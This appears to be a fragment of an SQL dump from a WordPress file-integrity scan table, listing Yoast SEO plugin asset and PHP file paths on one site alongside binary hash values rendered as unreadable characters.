('ð²†¹ð}ÉW3R$A_ÌO', 'wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸¬œ!¡|gšÚ7h«I', '#ÍÂ9€×€ßÐ[”Ô”OŽáÃß	:Œ-.h"˜,', '', 0, '?'),
('ù×j+DÌ™ÀEiMö3', 'wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'sR/gz28©ÌHø»Ê', '®®½ˆÌs''|iÒzÙÅr­{aÏówmí’7×WÆÑ.', '', 0, '?'),
('(§©ÙNÆ¢rƒ…! –Â', 'wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',íØ\r)´\nx‰7\\¢\\q', 'i—˜[[ô/ØJsoÜ*y¼ÜûB•ïNrŸ?~ujÄa*\r', '', 0, '?'),
('²Ypg±žìbûrˆ`Å(u', 'wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y2‚IÓ8êN"0=„Úç¸', '[÷eãÞð£Á³C"\077¤•µ]Û-I³MyUmâr', '', 0, '?'),
('u™E\\ŸÈ¤6UÊ\n§Iž]d', 'wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k BruÈ1)Z\rÎ²NŸû', '´_.¡[6ë)d²‹\Z¯¸Ù²"º2¶÷¥IÝ^×Ÿì', '', 0, '?'),
('$V-6xƒºÈg‚ža´•', 'wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾¢M~ûµ›)øV¼''Óô', 'Ë—ŒMÉ«¢ùï\Z±wã•ÞñDOÛíx¹;"UäY6“—', '', 0, '?'),
('Ã•â^R‡ƒ,¶D†êQHm', 'wp-content/plugins/wordpress-seo/css/main-sitemap.xsl', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'òÆ´“&|mø8)“‹', 'ã×mé''ÎýÛOH¹	C@üHúþí®é	Ì§ÌˆÆ', '', 0, '?'),
('¼6»\r“»öŠ¿îà\n³]à', 'wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Â3ÒÞxìzö°±\r÷X', '‡ŒÐ*žÄ¦k-øG(a\Z«ÀÆtwÞŒòß.ÔÄ¦ø', '', 0, '?'),
('hƒé.™¥b"l°^Sj', 'wp-content/plugins/wordpress-seo/images/academy/all_around_seo.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/all_around_seo.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­c¦&¹ÕÝÛÍlËPÕô', 'Â,bù@ 9qPlÞ.dþ\rN·Tvx|@øªç˜šG', '', 0, '?'),
('Óì#G`D|awÀV‡ú…', 'wp-content/plugins/wordpress-seo/images/academy/block_editor.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/block_editor.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±	ÀÐu4,3_k²>g-_', '6@q|ºâü^“SfSšÍÊW¹ª|Zô\r,=', '', 0, '?'),
('Ê—æÌ@S[Wë¦–…', 'wp-content/plugins/wordpress-seo/images/academy/copywriting.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/copywriting.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'mŠÿÄUX÷.{ë5\r¦', 'øNkÃe¯WF8˜@Ši÷`aä°2ˆÿ]eKé]ò»¬', '', 0, '?'),
('{€¦8A\nºÅ»ÒÂë¼', 'wp-content/plugins/wordpress-seo/images/academy/crawlability.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/crawlability.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œŸÃÃz&íoÀžœ9Ä‹õ', '©¥^R1!¥n•¦¸3ügÀ!w—5õ~ø·&ÐD®Iˆ', '', 0, '?'),
('U…NèUèEî–Ç:', 'wp-content/plugins/wordpress-seo/images/academy/ecommerce.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/ecommerce.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7€„‰ç ÿÅÁ~lÇ¤XÜ', '·±þ‘WÐJ¦‡šÿÄ‹ÌE"ÖñOµUü!FæM', '', 0, '?'),
('¨\nZŒ÷d*»•,ÿLÏÀ', 'wp-content/plugins/wordpress-seo/images/academy/hosting_and_server.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/hosting_and_server.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÓR÷…)‹þ¤_vTr×1', 'P­7¢î‰]|¡†-pgiÜ\\Å3Ñ¶Íß-¯(«ThÞ', '', 0, '?'),
('7ôu\Z#p¦/;PžXÞ¤u', 'wp-content/plugins/wordpress-seo/images/academy/keyword_research.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/keyword_research.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«b0ÍDMä‡@d_õNÇ', 'Ú¢!yÊ+‹µçåm—‚qUX­¥éWœjC½', '', 0, '?'),
('bµé=‹nN¼³*(~7wë^', 'wp-content/plugins/wordpress-seo/images/academy/local.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/local.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ã8ž&ú{¯ æÝÄp<‹;', 'g3Ì³¡3©:±þT®^ø¯$.Q\Z0ƒÌ1', '', 0, '?'),
('cqp|b%¯Ô|­,&S÷', 'wp-content/plugins/wordpress-seo/images/academy/multilingual.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/multilingual.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#{9ÔÒâS¦ŠDdäP', 'ÙŸH[¼ð`²b7UìUäÈÉÜœ(ŠqÌ:°¨­', '', 0, '?'),
('kóì‡&Ã©Jô	û__g­', 'wp-content/plugins/wordpress-seo/images/academy/seo_for_beginners.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/seo_for_beginners.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’¨ÿË4H~šÉ›a&§ó', 'jZ<ÝbAXKz‚‡™[\0hï›oúò¤®á‡íÏT®A', '', 0, '?'),
('ïÝú±8l\r?ËS”²Ìh', 'wp-content/plugins/wordpress-seo/images/academy/seo_for_wp.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/seo_for_wp.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FÁáL—H†¾6„•Ã', '=žƒlC>Àe÷cõž]µµ¡’{öXƒOI\nn·Ó', '', 0, '?'),
('¯½S£!Xòì© í‘é6ï', 'wp-content/plugins/wordpress-seo/images/academy/site_structure.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/site_structure.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æ¤AÖ‘ˆÜïÙBszC', 'ÔpŽüR ç}Tá°‚É[|UÇ¶¯Ô­þ&* $A', '', 0, '?'),
('Gva™˜œÑ˜ÕëöÓLœ', 'wp-content/plugins/wordpress-seo/images/academy/structured_data_for_beginners.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/structured_data_for_beginners.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!F­V¸ÐYFö§¦Æ|·Å', 'Â	3?ÞkZ,|''r•gœá]Ž˜>nØ4¾²úÆð', '', 0, '?'),
('Ìà-:ÈWrbÄLu‡ºæi', 'wp-content/plugins/wordpress-seo/images/academy/understanding_structured_data.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/understanding_structured_data.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉÏ*½+\Zþ?™±U’ª', 'ÿu$™3Ì;{–ŠeéÞå-©…Ú$tKÀoËR·ãžÊ', '', 0, '?'),
('äRßíè<¼²ÍÑ~C7m5Û', 'wp-content/plugins/wordpress-seo/images/academy/wp_for_beginners.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/wp_for_beginners.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Û\n¯>ô:·Ê3V!l’n“0', 'ÄÜ|ƒþ‚¿¡˜&L%9k¶y½}"6k_%\rñç­', '', 0, '?'),
('ÎOˆÒ:Ìbøî~2­ó½', 'wp-content/plugins/wordpress-seo/images/acf-logo.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/acf-logo.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾ˆÑ·ãîœ=B›õ#æ:&a', 'ÃatÄöËG±­Xm5Dc;x‰@æš|ð×=ôÌç~¦', '', 0, '?'),
('ÖÕmª|µ¿/Õ\nUž8''', 'wp-content/plugins/wordpress-seo/images/admin_bar.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/admin_bar.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³®.ï4¡¥˜äØ‚', 'Mñm£gAÉ5õD“j£Ò]³i<4J<Cúà{×l3', '', 0, '?'),
('{»”Ž*ÑíýzCŽGn', 'wp-content/plugins/wordpress-seo/images/ai-generator-preview.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/ai-generator-preview.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ºð[zmÇŽîÕ®²ßtÃZ', '·è -"YÙ)ÙÞo¢û`|u´:ì¼)¨Îñ¦@Î°y', '', 0, '?'),
('¦õ•þÌÅ…b> Óç¥', 'wp-content/plugins/wordpress-seo/images/ai-generator.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/ai-generator.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''Å‘ÉrjØƒæÇÊˆ', 'ãŠRžNës½žšZ‘ÈmˆxâcØj%%Dò\r°µ…ûÆ', '', 0, '?'),
('íªt3 .Çé^\0¹¡áŒ', 'wp-content/plugins/wordpress-seo/images/alert-error-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-error-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dyÑµJ6ÿhh2=YØ¸x', 'áS6]+Þu^L1nÞõƒ<»7ºÞÕ/Mõz™Þ`èf', '', 0, '?'),
('Þªÿ%‹Õð%-¦‰ÅàÂ…', 'wp-content/plugins/wordpress-seo/images/alert-info-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-info-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'B,è§ìÁóIµ÷ŽkÁE0°', '¨f‹/“#O4˜˜ùÛµQ˜svv»+½ºù&#Ñ', '', 0, '?'),
('Y²&)_¾˜´Š†w¾oÚ8¿', 'wp-content/plugins/wordpress-seo/images/alert-success-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-success-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°®?hå0XñÞüã¼ù', '¥,Ó0\ZA/ÕZëeK³O\\pÒ£\ndF¹Þ\nef‘i€', '', 0, '?'),
('ÎÈ5ÈF×,žYÚš.1Ö.”', 'wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'WH}™ç†ù³±Al~', '®’×ë2Ì¯ªÓæº%S=ÚtØˆ…nÚì=ñWc', '', 0, '?'),
('ÍIfþc)Ìá‡<<Oö', 'wp-content/plugins/wordpress-seo/images/cornerstone_content.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/cornerstone_content.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',''yaß,ÜŒa*¾·', 'kç0Á_\Z+‹“%QÿŒ—\0sóªÚTéîÑK9Hg7', '', 0, '?'),
('bEš#ë»vXá¾9Æ¯,', 'wp-content/plugins/wordpress-seo/images/error-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/error-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'âô+9¯U;1pÜÄ¿kt½[', 'ŠZrgÀÀ–6„¼‡JìÁv`Í<ócÄ›bš‡‰&', '', 0, '?'),
('\Z›<Žh¼Œ½''Ÿÿ³', 'wp-content/plugins/wordpress-seo/images/inclusive_language_analysis.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/inclusive_language_analysis.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡Ž©¤°õŠ5ø.(‹Ud	', '“Hñ>~RŒb‡Â³s½ .–t‘ŸÂÞâ¶ëÅ;hµ', '', 0, '?'),
('a(Â\0È''~¯§u”õÎ˜W', 'wp-content/plugins/wordpress-seo/images/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EÐ›´‹O0‹cº«Ag3', 'ÍÍ	èš {‘c¼FJÃw±¦!}aŸ˜ü9', '', 0, '?'),
('û?ÿà¡\0—‚fÿdø-ù', 'wp-content/plugins/wordpress-seo/images/indexables_3_left_bubble_optm.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/indexables_3_left_bubble_optm.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'MEyŠhN88Ÿ]€DD@', 'éÃlAj6û\nTCFJ¯…iNÐ»1;)äËì¯:4Û[', '', 0, '?'),
('?{®¨ _Ðã Qñ4<?', 'wp-content/plugins/wordpress-seo/images/indexnow.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/indexnow.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nã‘;`‰¼¡þ·À?ÿ/', 'vZpŸkTsâÆ€\0šØ9\rcâÚ‡®94\rß½‰9d', '', 0, '?'),
('K›IÀÃÏ`æ­ó:JâÆî', 'wp-content/plugins/wordpress-seo/images/insights.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/insights.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Û|ËÕ±•ú0NËoÚ*>¹J', '"R{0lÓòi,7&¼º5PpáaW·,Ë)VH+×', '', 0, '?'),
('õfÝ ç÷ëÂ(7Ýj¸', 'wp-content/plugins/wordpress-seo/images/link-in-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/link-in-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žìmÕ4tòê1D£ÆÀš', '†Ÿ?Ó½p»’ÄM©R÷‡Ø\nIØôÔm¡#¸', '', 0, '?'),
('š—Á?¸ E³Õ¼ÊúU', 'wp-content/plugins/wordpress-seo/images/link-out-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/link-out-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–ï—ª¬ )"´Õ&ìS', 'çÌ|¨¨ó>ãÑ²¦áˆ<¨_]*[GXrÁ$½ïJ', '', 0, '?'),
('Ôµ3Ã1þ¾ž''È¿VüÁ«', 'wp-content/plugins/wordpress-seo/images/link_suggestions.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/link_suggestions.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b¢Êðj–Š^)S\\VŠ}	', '*Qy4KØ<ÀUæxlùM5Sûd]‚J¬I$¸”ÊÉ', '', 0, '?'),
('*÷ìgó±Õä¾‰õH', 'wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ,ò„40×xl‚·ÖZ,', '‡à?w0ÐDN¢Ý¡éir‡$À*¶æÒÍ:Fð¶', '', 0, '?'),
('\\¡ÉŠ6O+tÖõ÷jRø{', 'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_man_1_optim.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_man_1_optim.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w2+û6:+tºTØþ–Ëÿ@', '`w,‚Ý¯c/¦ìÙ>BÇêŽiŠ_Kh²iM?ä®', '', 0, '?'),
('r)FõScS–I£æ2C', 'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã†t–VÎO§Ï+ó«mF', '¤òš)-n€Ñ—Ãd¶™\\Go‹QÀ	3Ý°}ïš2', '', 0, '?'),
('´t¥Ð¿j—¤ZKö7 ]Œ', 'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_2_optim.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_2_optim.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”r˜Ðr!¥9åì{A', 'k÷ÐAù|‚Ô¯<vç­	!A7ê\\èjòK°K¡Ø°Éí', '', 0, '?'),
(']zJ„S3ã''¶kÉ>', 'wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'C(`à¾|UvšwŸÊÜ', 'aµ''\ZŽˆ<zdŠ°ýƒ3±(ÑCç;x@`Tà¯ö^ùÑ', '', 0, '?'),
('¶·]y²«œì}­ÊË8£', 'wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>Íó1J/–õGñ}@Ê÷', '/›„­_Juçüû«u–9×šIÒ «Ñ[?aÿ‘ƒ0¢Y·', '', 0, '?'),
('™v|¹¼ÎU§š”•J!b', 'wp-content/plugins/wordpress-seo/images/open_graph.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/open_graph.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«ò¡Ïý&=*©ÙI|Ëè', 'ËÄ:„ûlÿùæSÏ®r­ûÿ§‚ñÕ-}=I\Z•À', '', 0, '?'),
('%†‚qù#À©A¾†ê£U»ÿ', 'wp-content/plugins/wordpress-seo/images/plugin_subscription.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/plugin_subscription.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àÄ×Ö7ä,ý_p Ò', '„o…¢ç›–¤pâ`þcR+Í½»]<ç\n»PmþZîÊ', '', 0, '?'),
('ltíö´¼%°ØLÚçïÕ„p', 'wp-content/plugins/wordpress-seo/images/question-mark.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/question-mark.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷|iü‰)dÙÀpOd(', 'IˆKLl\r‘Ò¦ß“Â	S“ëÊ¨re4>bI¥]', '', 0, '?'),
('Ð®¡ØvÒWLÑ¤©š', 'wp-content/plugins/wordpress-seo/images/readability-icon.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/readability-icon.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'i¢‹“Fh0½ØBãŽã}´', 'ÁW»ÿ\nÀßƒ¦ì™¹ºÓ÷‰ß7ø`rÜÅ{INÒF', '', 0, '?'),
('µb8DÁ!™qÒ`a‰I¿ä', 'wp-content/plugins/wordpress-seo/images/readability_analysis.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/readability_analysis.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§;Þ&ëCx§Ê·‹¢£¤`', 'oç ¡4ì/»¥>ê©–à~M‚ü@¨5 ¤°ç›ë.A', '', 0, '?'),
('iÝ63®½¼C|w—tÿ„', 'wp-content/plugins/wordpress-seo/images/rest_api.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/rest_api.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'KÆsÓöÇrä[\\í', 'YC.;PaÜüŒ¤üJÈ}ÉÖœýxê¨ÕcÅCA', '', 0, '?'),
('bÆ˜å•9™?KCü‚D2¸«', 'wp-content/plugins/wordpress-seo/images/seo_analysis.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/seo_analysis.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd´Î&QŒÚžx/\r°lâ^Æ', '5Ê‘Bæ›Jf–ÕóþÅúÂŒ¼¦—A>î¿m¸¿»ë””', '', 0, '?'),
('Õ`:ƒy:²‡\Zk\r\r)N7', 'wp-content/plugins/wordpress-seo/images/slack_sharing.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/slack_sharing.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–™Šº G˜@žƒ‹w', '‚¶æXõ]ÍŽ	­ÖÓ#)M¶,eS\n:''»9&3‹Ë', '', 0, '?'),
('Iì ÿÿ‚ƒ+nÓÌh^°¨', 'wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰%l¹)ï&\rä-“”Ê', 'N¨S4ÿä–Û×¨IÆÿ»¦°2²)^¼Æri\0Oö~ô', '', 0, '?'),
('§n3TÄ@Äý€Ú7ÒÜÜ§', 'wp-content/plugins/wordpress-seo/images/succes_marieke_bubble_optm.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/succes_marieke_bubble_optm.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Žl*ÜäMÄ1©TŽ[\n:Z|', '­ “}êL³¡ÝÍ25ógÅ(\\£-fÄ’5Û­KàUå', '', 0, '?'),
('í/ƒ«2´î/óG;\0+o', 'wp-content/plugins/wordpress-seo/images/support/github.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support/github.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J ŠË°ôÅ~¯{ëQêŠ', 'ö/zÕ‰½š2æ¬——T:¬µäøaäR¦8', '', 0, '?'),
('ð{ŒÆAôA’T\\íÇ]', 'wp-content/plugins/wordpress-seo/images/support/help_center.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support/help_center.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ëœ†6ºJš.›TÈ<…', ';Ì@ñÿË;ª72_­8R»N~*}aˆ&l’ƒ+Þ', '', 0, '?'),
('\ruE2Æé@ýÄ¼üÃY_ìÏ', 'wp-content/plugins/wordpress-seo/images/support/support_forums.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support/support_forums.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Zýñõ¿’ÞMqœá®\0™', 'Þt\0|&­<\\Âk²6à\Z×¥ŒcÜSâ¯²Ý‰„', '', 0, '?'),
('‹Í“*Iê6–D°ÛõYþµ', 'wp-content/plugins/wordpress-seo/images/support-team.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support-team.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„4ï_ôRxÏÀ›§D²', 'L4ÝÐÛvŒ&a''2evó eØ¿‡÷št:A`Ø', '', 0, '?'),
('fªSKùoÜók‡“²‹úT', 'wp-content/plugins/wordpress-seo/images/text_link_counter.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/text_link_counter.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“îÍd«îîÌ(¶‚÷', '6È¿âý[gnSî¨Ü·Û³È» ×¼“nà;&O', '', 0, '?'),
('¼v€—L~Éê-ä&ÏH\n¹º', 'wp-content/plugins/wordpress-seo/images/twitter_card.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/twitter_card.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à9{¼\0ê|<‚^ŠúaŽ', '·¬<§JÎšÉyí3ÕP…Ã ˆ¹_¨4][Ë²¬èþ', '', 0, '?'),
('€ßæ)e³â.¯ˆ\nOè', 'wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"²§0”GiQf¿Êì²i6ˆ', 'æš<Ö	26^S­]Ä¯AŸÑ-þ0L}Ê‚2®` PÄ', '', 0, '?'),
('ÏcÜ÷É8é»ôÚ²šž$n', 'wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùFÓR>†9üºÃh´“£', '¯ÉÞOÂó‘°Éé¥¡)ƒqÓ8¨¬{*×Üµ•Q`', '', 0, '?'),
('‡¹`½÷`W™\ZÙ^k^', 'wp-content/plugins/wordpress-seo/images/xml_sitemaps.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/xml_sitemaps.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*	fùE \ZÎü¤ø`', 'Ä«\Z&À''Ñ§‹yÏZü÷·¶!g˜²«uÞÂX\0\0ç', '', 0, '?'),
('''ÈIùð÷³ Õ˜¡ÙqpE', 'wp-content/plugins/wordpress-seo/inc/class-addon-manager.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-addon-manager.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ý×Ý"¦ø0õªï¹kÆã!', 'ÃREÆFÄGôo¥Ú( DBô=jßÅÐÅŒ Ó>Fûñàoþ', '', 0, '?'),
('rÿ¿¶¥Îýº*ƒ™-(', 'wp-content/plugins/wordpress-seo/inc/class-my-yoast-api-request.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-my-yoast-api-request.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'äm6ú UîlSà¡`', '¶º(”Â¿š®‚¤…ƒúGµ"‹-\Z±“¨LÊh ¦«9 ', '', 0, '?'),
